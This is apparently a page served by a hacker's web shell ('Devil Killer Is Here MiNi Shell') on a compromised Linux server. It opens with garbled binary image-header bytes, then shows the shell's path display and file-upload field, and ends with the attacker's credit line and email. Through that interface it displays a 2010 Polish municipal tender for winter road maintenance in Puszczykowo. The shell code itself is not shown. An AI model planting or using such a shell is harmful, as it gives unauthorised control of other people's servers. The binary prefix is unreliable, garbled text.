JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/326948-N-2010.html

<p class="kh_header"><b>Puszczykowo: Zimowe utrzymanie ulic na terenie Miasta Puszczykowa - Zima 2010/2011.</b><br>
<b>Numer ogłoszenia: 326948 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Podleśna 4, 62-040 Puszczykowo, woj. wielkopolskie, tel. 061 8133225, 8983719, faks 061 8133225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puszczykowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic na terenie Miasta Puszczykowa - Zima 2010/2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonywanie usług komunalnych w okresie od dnia podpisania Umowy do dnia 30 kwietnia 2011 roku, polegających na zimowym utrzymaniu dróg na terenie Miasta Puszczykowa. Wykonywanie usługi zimowego utrzymania polega w szczególności na:
1)	odśnieżaniu ulic 						-	880 km
2)	posypywaniu ulic żużlem					-	330 km
3)	posypywaniu ulic 20% mieszanką piasku z solą			-	220 km
4)	posypywaniu ulic 50% mieszanką piasku z solą			-	330 km
5)	posypywaniu ulic solą (100%)					-	440 km
6)	posypywaniu skrzyżowań ( solą )				-	400 razy
7)	wywiezieniu śniegu z ulic					-	500 m3
8)	odśnieżaniu ulic gruntowych          (8-krotnie x 20km)           	 -          160km
Wskazane powyżej ilości kilometrów i krotność posypywania mają charakter orientacyjny. 

Utrzymanie zimowe dróg. Zasady realizacji zamówienia:
Zimowe utrzymanie dróg - wg wykazu standardu zimowego utrzymania określonego w zał. nr 3 do SIWZ. Zimowe utrzymanie dróg polega na odśnieżaniu i usuwaniu skutków gołoledzi na drogach miejskich (drogi, ulice, parkingi, zatoki autobusowe, chodniki przylegające do zatok autobusowych). Do zimowego utrzymania dróg zalicza się także utrzymanie całodobowego dyżuru gotowości Akcji Zima.
1.	Utrzymanie zimowe dróg odbywa się do 30 kwietnia 2011 roku.
2.	Utrzymanie zimowe dróg na terenie Miasta Puszczykowa obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa ruchu w tym:
	a) odśnieżanie z całej szerokości jezdni, ulic, zatok autobusowych i utrzymaniem stałej 	przejezdności 	na drogach utwardzonych,
	b) usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków 	chemicznych 	i środków powodujących szorstkość nawierzchni,
	c) odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania 	mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla 	pługów,
	d) posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość nawierzchni po 	odgarnięciu śniegu i lodu (na wniosek Zamawiającego ulice Starego Puszczykowa mogą być 	posypywane żużlem),
	e) likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze 	szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi                     	i środkami powodującymi szorstkość (w przypadku utrudnionego podjazdu posypywarek),
	f) odśnieżanie na szerokości do 6 m (tam gdzie jest to możliwe) jezdni dróg nieutwardzonych i 	utrzymywanie stałej przejezdności.
3.	Inne obowiązki Wykonawcy w ramach utrzymania zimowego:
	a) dysponowanie dostateczną do bieżącego wykonywania zabiegów liczbą sprzętu 	specjalistycznego (pługopiaskarki itp.) w tym, w przypadku wystąpienia wzmożonych warunków 	zimowych lub warunków uznanych za klęskę żywiołową uzupełnienie dodatkowego sprzętu o: pługi 	odśnieżne, ładowarki, sprzęt holowniczy, itp.,
	b) zakup piasku, żużla i soli drogowej w ilościach niezbędnych do prowadzenia akcji zimowej oraz 	przygotowanie pojazdów i sprzętu (konserwacja, remonty) przed jej rozpoczęciem,
	c) zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla 	przyjmowania   	zgłoszeń od wytypowanego pracownika Urzędu Miasta oraz zgłaszanie 	pracownikowi Urzędu 	Miasta sytuacji na drogach,
Rejestr dobowy przebiegu usługi potwierdza każdorazowo wytypowany przedstawiciel Urzędu Miasta Puszczykowo - zgodnie z załączonym wzorem - załącznik nr 5 SIWZ.
	d) przyjmowanie zgłoszeń od: pogotowia, Policji, Straży Miejskiej oraz wytypowanego pracownika 	Urzędu Miasta,
	e) organizowanie wewnętrznej gotowości pracy w taki sposób, aby w ciągu jednej godziny po 	otrzymaniu zgłoszenia od wytypowanego przedstawiciela UM lub w czasie zgodnym z wytycznymi 	Standardu zimowego utrzymania, przystąpić do wykonywania czynności związanych z 	zimowym 	utrzymaniem dróg, 
	f) przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstawanie 	zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg o 	największym znaczeniu komunikacyjnym i na głównych 	skrzyżowaniach Miasta, 
	g) odśnieżanie jezdni ulic należy prowadzić na całej szerokości z zachowaniem odległości nie 	większej niż 30 cm od strefy przykrawężnikowej. Należy zwracać szczególną uwagę na 	dokładne 	odśnieżanie skrzyżowania ulic i dróg w odległości 10 m od przejścia dla pieszych oraz spadków 	podłużnych i poprzecznych. Przy odśnieżaniu ulic gruntowych prace należy prowadzić do 	szerokości 6 m ( w zależności od szerokości drogi), zwracając szczególną uwagę na elementy 	infrastruktury technicznej w jezdni,
	h) przy zgarnianiu śniegu z jezdni nie należy zasypywać przejść, przystanków 	autobusowych oraz 	skrzyżowań,
	i) podejmowanie następujących działań w sytuacji wynikających np. z intensywnych opadów 	śniegu lub zalegającego błota pośniegowego:
-	odśnieżanie szczególnie w okresach roztopów (błoto pośniegowe) należy prowadzić w 	sposób 	uwzględniający zabezpieczenie odpływu wody do studzienek kanalizacyjnych znajdujących się na 	trasach objętych prowadzoną akcją,
-	odśnieżanie zatok przystankowych należy prowadzić tak, aby zwały śniegu nie pozostawały przy 	krawędzi zatoki przystankowej utrudniając wsiadanie i wysiadanie z autobusu,
-	zwalczanie śliskości zimowej przez posypywanie mieszankami piaskowo-solnymi w celu 	uzyskania możliwości poruszania się pojazdów należy prowadzić zgodnie z określonymi 	przepisami o ruchu drogowym w utrudnionych warunkach atmosferycznych,
-	Wykonawca ma obowiązek rozpoczęcia prac w ciągu jednej godziny po otrzymaniu zgłoszenia od 	Zamawiającego. Zamawiający, w każdej chwili, jeżeli uzna dalszą akcję odśnieżania za 	zbędną, 	może zatrzymać pracę sprzętu i wezwać Wykonawcę do zaprzestania akcji. Za wykonany zakres 	pracy Wykonawca otrzyma określone umową wynagrodzenie,
-	Wykonawca może wystawić Zamawiającemu fakturę każdorazowo po 15 dniach miesiąca. 	Podstawą do wystawienia faktury jest protokół odbioru, który należy sporządzić jako zestawienie 	obrazujące łączną ilość kilometrów dróg pomnożonych przez krotność ich utrzymania oraz 	panujące w tym czasie warunki pogodowe,
-	cena ryczałtowa za jeden kilometr prowadzenia Akcji Zima powinna uwzględniać w 	szczególności: koszt odśnieżania lub posypywania całej szerokości jezdni przy pełnym 	wykorzystaniu 	posiadanych środków technicznych, koszt zakupu materiału, pracy sprzętu i ludzi, 
-	w robocze dni tygodnia, tj. od poniedziałku do piątku o godz. 900 rano Wykonawca przesyłał 	będzie za pomocą faxu, do siedziby Zamawiającego raport o stanie dróg informujący, jakie drogi i o 	której godzinie zostały odśnieżone w ciągu minionej doby, oraz jaki jest aktualny stan nawierzchni 	dróg wchodzących w zakres umowy, a także na których drogach pracuje sprzęt,
-	Wykonawca we własnym zakresie zapewni odpowiednią ilość soli, piasku i żużla, która 	wystarczy 	na prowadzenie Akcji Zima w okresie objętym umową. Ilość użytej soli drogowej do 	posypywania 	ulic ma wynosić jednorazowo 50 g na m2 powierzchni. Sól drogowa 	wykorzystywana do posypywania ulic 	winna spełniać wymogi normy PN-86 C-84081 02. 	Materiały chemiczne stosowane w ramach Akcji Zima, muszą być składowane w 	odpowiednich, ekologicznych magazynach, niepowodujących uciążliwości dla środowiska, a ich 	wykorzystywanie winno się odbywać zgodnie z wymaganiami ochrony środowiska określonymi 	przepisami prawa. Wykonawca w zestawieniu miesięcznym przedstawi Zamawiającemu 	pisemną informację dotyczącą ilości zużytego materiału,
-	w przypadku wystąpienia szczególnie niekorzystnych warunków atmosferycznych, Wykonawca 	posypie solą miejsca newralgiczne takie jak: strome podjazdy, łuki, skrzyżowania, przystanki 	autobusowe, parkingi, przejścia dla pieszych. Kierowca pojazdu płużącego ma obowiązek wozić ze 	sobą, a w razie konieczności użyć do ręcznego posypywania lub odśnieżania, sprzęt typu: łopata. 	Odśnieżaniu i posypywaniu podlega nie tylko tor ruchu pojazdu, ale w przypadku skrzyżowań, 	również odcinki dróg wlotowych krzyżujących się w ramach jednego skrzyżowania oraz 	powierzchnie 	jezdni wyłączone z ruchu, co ma zapobiec powstawaniu zwałów śniegu w 	miejscach skrzyżowań. 	Drogi wlotowe powinny być odśnieżane na odcinku 10 metrów. 	Odśnieżaniu podlegają 	również zatoki autobusowe, pasy włączeń i wyłączeń, które muszą być 	odśnieżane przez Wykonawcę w ramach odśnieżania drogi, na której się znajdują. Powyższe 	będzie przedmiotem kontroli w terenie, a za zaniedbania w zakresie odśnieżania                                     	i posypywania 	ww. odcinków dróg wlotowych, zatok i przejść 	dla pieszych, Wykonawca zostanie 	każdorazowo obciążony karą finansową określoną w umowie, 
-	każdorazowo po wykonaniu prac zawartych w umowie Wykonawca zobowiązany jest do 	uzyskania pisemnego potwierdzenia od wytypowanego przedstawiciela UM o wykonanych 	pracach.
-	Wykonawca we własnym zakresie zabezpieczy odpowiedni sprzęt, który powinien być 	sprawny 	technicznie i niezawodny, posiadający aktualne badanie techniczne i świadectwo o dopuszczeniu 	do ruchu na drogach publicznych i odpowiednio przystosowany do posypywania powierzchni 	środkami powodującymi szorstkość nawierzchni (żużel, piasek lub mieszanka piasku i soli) 	oraz do płużenia powierzchni drogi.
	j) Zamawiający zastrzega, że w przypadku stwierdzenia niewłaściwego wykonywania obowiązków 	umowa może zostać zerwana. Wykonawcy nie przysługiwać będą żadne roszczenia z tego tytułu, za 	wyjątkiem wynagrodzenia należnego z wykonanej części umowy.
Informacje uzupełniające.
	1. Na pozostałych drogach (drogi gruntowe) Miasta nie ujętych w dodatkach do SIWZ, przewiduje się 	wykonywanie zabiegów odśnieżania tylko na zlecenie Zamawiającego.
	2. W warunkach występowania zimy bardzo ciężkiej - klęski żywiołowej Wykonawca zapewni 	przejezdność na drogach i ulicach w czasie nie dłuższym niż 3 godziny. Dopuszcza się 	pozostawienie na nawierzchni jezdni drogi utwardzonej cienkiej, równomiernej warstwy zajeżdżonego 	śniegu, który należy usunąć na wszystkich drogach i ulicach w ciągu 24 godzin,
	3. W celu sprawnej realizacji zamówienia, zalecane jest aby Wykonawca dysponował bazą 	terenową (sprzętowo-magazynową, wraz z miejscem gromadzenia piasku i środków chemicznych) 	na terenie objętym przedmiotem zamówienia,
	4. W przypadku wystąpienia warunków zimy bardzo ciężkiej lub warunków uznanych za klęskę 	żywiołową, Wykonawca zagwarantuje w ciągu 2 godzin od otrzymania dyspozycji 	niezbędny sprzęt 	do utrzymania przejezdności na drogach.
	5. Dopuszcza się odstępstwa od standardu zimowego utrzymania dróg zgodnie z 	Załącznikiem Nr 1 	do Zarządzenia Nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25 października 1994r. 	(Dziennik Urzędowy MTiGM Nr 10)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3.000,00 pln (słownie: trzy tysiące 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej trzy zadania o wartości powyżej 100.000,00 pln netto każde, polegające na zimowym utrzymaniu ulic.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował następującym sprzętem: pługi odśnieżne - 3 szt., piaskarki - 3 szt., ładowarki - 1 szt., sprzęt holowniczy.
-Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada bazę sprzętu oraz miejsce składowania soli, piasku i żużlu w odległości nie większej niż 15 km od miejsca świadczenia usług - dla potrzeb niniejszego zamówienia przyjęto, że jest to skrzyżowanie ulic Poznańskiej i Kościelnej w Puszczykowie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>potwierdzona za zgodność z oryginałem kserokopia aktu własności lub dzierżawy terenu na potwierdzenie, że Wykonawca posiada bazę sprzętu oraz miejsce składowania soli, piasku i żużlu w odległości nie większej niż 15 km od miejsca świadczenia usług - dla potrzeb niniejszego zamówienia przyjęto, że jest to skrzyżowanie ulic Poznańskiej         i Kościelnej w Puszczykowie
-wypełniony i podpisany formularz ofertowy ( wg. wzoru stanowiącego załącznik nr 1 do niniejszej specyfikacji) wraz z wykazem materiałów objętych przedmiotem zamówienia,
-dowód wniesienia wadium,
-upoważnienie w przypadku składania oferty wspólnej do reprezentowania wszystkich podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość istotnej zmiany postanowień zawartej Umowy w stosunku do treści oferty na podstawie której dokonał wyboru Wykonawcy. Zmiany mogą dotyczyć:

1.    Wydłużenia terminu wykonania przedmiotu Umowy w przypadku zaistnienia okoliczności:
    -  za którą odpowiedzialny jest Zamawiający,
	- niezależnych od stron.
       Przedłużenie terminu wykonania przedmiotu Umowy nastąpi o tyle dni, ile trwała przeszkoda w jej wykonywaniu bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. Podstawą do przesunięcia terminu jest pisemne zawiadomienie Zamawiającego o zaistniałej przeszkodzie lub okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puszczykowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Puszczykowie
ul. Podleśna 4 ,62-040 Puszczykowo

pon. 8.00-16.00 wt-pt. 7.30-15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 10:55, miejsce: Oferty należy składać do dnia 19 października 2010 roku do godz. 10:55 w: Urzędzie Miejskim w Puszczykowie - kancelaria, budynek A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com